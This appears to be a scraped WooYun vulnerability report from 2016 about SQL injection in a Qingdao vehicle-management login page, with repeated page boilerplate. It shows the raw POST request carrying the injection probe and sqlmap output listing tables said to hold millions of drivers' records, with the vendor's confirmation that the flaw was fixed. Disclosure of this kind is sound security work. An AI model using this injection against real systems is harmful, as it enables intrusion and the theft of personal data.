山东省某市机动车系统SQL注射（涉及700W驾驶员信息/涉及大量数据/涉及众多个人信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0171954

漏洞标题：山东省某市机动车系统SQL注射（涉及700W驾驶员信息/涉及大量数据/涉及众多个人信息）

漏洞作者：路人甲

提交时间：2016-01-22 17:13

修复时间：2016-03-08 21:29

公开时间：2016-03-08 21:29

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(公安部一所)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-22：细节已通知厂商并且等待厂商处理中
2016-01-25：厂商已经确认，细节仅向厂商公开
2016-02-04：细节向核心白帽子及相关领域专家公开
2016-02-14：细节向普通白帽子公开
2016-02-24：细节向实习白帽子公开
2016-03-08：细节向公众公开

简要描述：

详细说明：

http://**.**.**.**/login.html 青岛市机动车管理平台登录处存在POST注入，涉及多库，700W驾驶员个人信息。sqlmap跑的太慢，跑了几个表作为证明。涉及700W个人信息以及1000W+账号信息

漏洞证明：

POST /login HTTP/1.1
Host: **.**.**.**
Content-Length: 45
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/login.html
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=AC7D70A92BB1F74CE95AD8189224A68F; Hm_lvt_0ed52a43cd7f443cd0fa7b719c4f89d7=1453449764; Hm_lpvt_0ed52a43cd7f443cd0fa7b719c4f89d7=1453449764
username=aaa%27&password=aaaa&verifycode=ylao

POST包

Database: DFO
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| PRO_TRAININFO               | 18376655 |
| STU_TRAININFO_16_01         | 18173603 |
| STU_TRAININFO_15_07         | 16242461 |
| STU_TRAININFO_15_06         | 15847453 |
| STU_TRAININFO_15_05         | 15456639 |
| STU_TRAININFO_15_04         | 15067229 |
| STU_TRAININFO_15_03         | 14459976 |
| STU_TRAININFO_15_02         | 14218551 |
| STU_TRAININFO_15_01         | 13850649 |
| STU_TRAININFO_14_12         | 13482044 |
| STU_TRAININFO_14_11         | 13115686 |
| STU_TRAININFO_14_10         | 12729705 |
| STU_TRAININFO_14_09         | 12319383 |
| STU_TRAININFO_14_08         | 11898475 |
| STU_TRAININFO_14_07         | 11402647 |
| STU_TRAININFO_14_06         | 10942650 |
| STU_TRAININFO_14_05         | 10480976 |
| STU_TRAININFO_14_04         | 9982631 |
| T_ZC_RK_QDJJ_STUDENT        | 6383300 |
| GEN_PRO_STUDENTAPPLY        | 5504936 |
| GEN_STUDENTEXAMINFO         | 5222804 |
| GEN_BUYCLOCKINFO            | 3350069 |
| GEN_PRINTMANAGE             | 3317294 |
| GEN_PRO_STUDENTAPPLY_1120   | 2484853 |
| GEN_PRO_STUDENTAPPLY_ZZ     | 2441126 |
| GEN_STUDENTEXTINFO          | 1542788 |
| GEN_STUDENTINFO             | 1542726 |
| PRO_COACHTEACH_14           | 1377524 |
| PRO_COACHTEACH_15           | 1182004 |
| EQU_INCOMEINFO              | 1156491 |
| EQU_ICCARDINFO              | 1144938 |
| PRO_CARDUSEINFO             | 1103038 |
| PRO_COACHTEACH_13           | 1083423 |
| PRO_WXTRAININFO             | 1045464 |
| GEN_STUDENTCARDINFO         | 1041305 |
| PRO_COACHTEACH_12           | 736027  |
| BILL_PXJLDINFO              | 442400  |
| GEN_STUDENTINFO_POLICE      | 261659  |
| ONLINE_LOGINFO              | 243801  |
| TMP_GEN_PRINTMANAGE         | 125503  |
| PRO_COACHTEACH_11           | 90927   |
| STUDENT_1                   | 81334   |
| OA_READLOG                  | 67733   |
| GEN_PRO_RETIREAPPLY         | 58165   |
| STU_TRAININFO_12_05         | 57104   |
| PRO_COACHTEACH_16           | 55302   |
| STU_TRAININFO_12_08         | 53558   |
| STU_TRAININFO_12_04         | 52244   |
| PRO_LOCKCARD                | 51908   |
| STU_TRAININFO_12_11         | 50787   |
| STU_TRAININFO_12_06         | 50634   |
| STU_TRAININFO_12_07         | 50434   |
| PRO_ICMAKEUPINFO            | 49402   |
| STU_TRAININFO_12_12         | 48018   |
| STU_TRAININFO_12_03         | 47141   |
| STU_TRAININFO_12_10         | 46997   |
| STU_TRAININFO_12_09         | 46254   |
| STUDENT                     | 36655   |
| TEMP_EQU_ICCARD_KEY         | 35855   |
| STU_TRAININFO_12_02         | 30955   |
| EQU_DRAWDETAIL              | 26409   |
| EQU_DRAWINFO                | 25194   |
| BILL_PXJLDINFO_BAKK         | 22200   |
| GEN_PRO_AMENDDETAIL         | 22090   |
| STU_TRAININFO_13_01         | 21880   |
| GEN_PRO_AMENDINFO           | 21012   |
| STU_TRAININFO_11_12         | 20769   |
| STU_TRAININFO_13_08         | 15877   |
| PUB_FINGERINFO              | 15676   |
| EQU_POSUSEINFO              | 14207   |
| STU_TRAININFO_13_03         | 14002   |
| STU_TRAININFO_12_01         | 13929   |
| STU_TRAININFO_13_07         | 13721   |
| GEN_PRO_STACKINFO           | 13313   |
| BILL_PHGL_DETAIL            | 13257   |
| STU_TRAININFO_13_09         | 11842   |
| STU_TRAININFO_13_06         | 10287   |
| STU_TRAININFO_13_02         | 10169   |
| DS_TEST                     | 9060    |
| STU_TRAININFO_13_12         | 8441    |
| BILL_PHGL_MASTER            | 8260    |
| SCH_COACHEXTINFO            | 8129    |
| SCH_COACHINFO               | 8129    |
| STU_TRAININFO_13_10         | 7639    |
| SCH_COACHCARDINFO           | 7449    |
| BI_TRAININFO                | 7253    |
| SCH_COACHHISTORYINFO        | 7010    |
| STU_TRAININFO_14_01         | 6968    |
| STU_TRAININFO_13_11         | 6910    |
| STU_TRAININFO_13_04         | 6835    |
| STU_TRAININFO_14_03         | 6772    |
| STU_TRAININFO_11_11         | 6694    |
| STU_TRAININFO_13_05         | 6612    |
| EQU_POSINFO                 | 6550    |
| SCH_COACHTEACHCARTYPE       | 6258    |
| SYS_ROLEPOWER               | 6116    |
| GEN_STUDENTSOURCE_CHANGELOG | 6078    |
| STU_TRAININFO_14_02         | 5737    |
| SCH_SCHOOLCARINFO           | 5456    |
| PRO_LOCKCARD_BAK20120709    | 5279    |
| TEMP_1                      | 4353    |
| SCH_CHECKMANINFO            | 4352    |
| TMP_POS                     | 4325    |
| SCH_SCHOOLCARINFO_BAK       | 4261    |
| STU_TRAININFO_15_08         | 3621    |
| SCH_PRO_COACHAPPLY          | 3465    |
| OA_MESSAGEOBJECT            | 3267    |
| STU_TRAININFO_15_09         | 2491    |
| STU_TRAININFO_15_10         | 1971    |
| SYS_LOGINFO                 | 1822    |
| STU_TRAININFO_11_10         | 1818    |
| STU_TRAININFO_15_11         | 1797    |
| SCH_SCHOOLCARPDINFO         | 1748    |
| T_ZC_RK_QDJJ_EXAM           | 1375    |
| GEN_STUDENTEXAMSCORE        | 1310    |
| SCH_TUITIONINFO             | 1245    |
| QUEST_SOO_EVENT_CATEGORIES  | 1244    |
| STU_TRAININFO_15_12         | 1171    |
| STUDENT_3                   | 1069    |
| SCH_COA_VALIDDATE_LOG       | 811     |
| OA_MESSAGEINFO              | 625     |
| PRO_TRAININFO_141114        | 610     |
| OA_ATTACHMENTINFO           | 509     |
| EQU_POWERINFO               | 498     |
| SYS_PRINT_ZZDY              | 430     |
| SYS_PRINT_ZZDY_141125       | 420     |
| COA_CARDSETLOG              | 386     |
| SYS_FUNINFO                 | 317     |
| SCH_SECONDCOACHINFO         | 271     |
| SYS_USERROLE                | 256     |
| SYS_USERPORTAL              | 241     |
| SYS_USERINFO                | 230     |
| SYS_DICTIONARY              | 127     |
| SYS_MENUINFO                | 127     |
| SYS_ROLEINFO                | 121     |
| EQU_STEPPEDUPINFO           | 93      |
| STUDENT_5                   | 84      |
| SYS_POLICE_DICTIONARY       | 76      |
| SCH_SCHOOLEXTINFO           | 69      |
| SCH_SCHOOLINFO              | 69      |
| PRO_TRAINBILLPARAM          | 64      |
| TEACH_EXAMPERIOD            | 64      |
| TEACH_EXAMPERIOD_20150318   | 64      |
| SYS_KEYVALUE                | 57      |
| BILL_PHGL_DETAIL_BAKK       | 55      |
| BILL_PHGL_MASTER_BAKK       | 55      |
| SCH_COA_OVERAGE_LOG         | 49      |
| STUDENT_2                   | 39      |
| GEN_STUDENPRESIGN           | 38      |
| TEACH_COD_TEACHTYPE         | 25      |
| PBCATEDT                    | 21      |
| PBCATFMT                    | 20      |
| TEACH_TARIFF                | 17      |
| TEACH_DRIVECARPARAM         | 16      |
| TEACH_DRIVECARTYPE          | 16      |
| SYS_PARAMINFO               | 14      |
| SYS_DEPTINFO                | 12      |
| EQU_DEVICEINITRECORD        | 9       |
| SYS_AREAINFO                | 9       |
| EQU_MATERIELINFO            | 6       |
| EQU_STORAGEINFO             | 6       |
| GEN_PRO_AMENDPARA           | 6       |
| SCH_SCHOOLLICENCE           | 4       |
| TEACH_EXAMSUBJECTINFO       | 4       |
| TEACH_PRICEPARAM            | 4       |
| GEN_PRO_STUDENTAPPLY_3GZZ   | 2       |
| EQU_PARAMINFO               | 1       |
| EQU_UPDATEFILEINFO          | 1       |
| INF_DBLINK                  | 1       |
| PRO_WRITELOG                | 1       |
| QUEST_SOO_PARSE_TIME_TRACK  | 1       |
| QUEST_SOO_VERSION           | 1       |
| SCH_SCHOOLMANAGERS          | 1       |
| SCH_SCHOOLPLACEINFO         | 1       |
+-----------------------------+---------+

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-01-25 15:19

厂商回复：

感谢提交！！
验证确认所描述的问题，已通知其修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0171954

漏洞标题：山东省某市机动车系统SQL注射（涉及700W驾驶员信息/涉及大量数据/涉及众多个人信息）

相关厂商：山东省某市机动车系统

漏洞作者：路人甲

提交时间：2016-01-22 17:13

修复时间：2016-03-08 21:29

公开时间：2016-03-08 21:29

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(公安部一所)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0171954

漏洞标题：山东省某市机动车系统SQL注射（涉及700W驾驶员信息/涉及大量数据/涉及众多个人信息）

相关厂商：山东省某市机动车系统

漏洞作者： 路人甲

提交时间：2016-01-22 17:13

修复时间：2016-03-08 21:29

公开时间：2016-03-08 21:29

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(公安部一所)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0171954"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云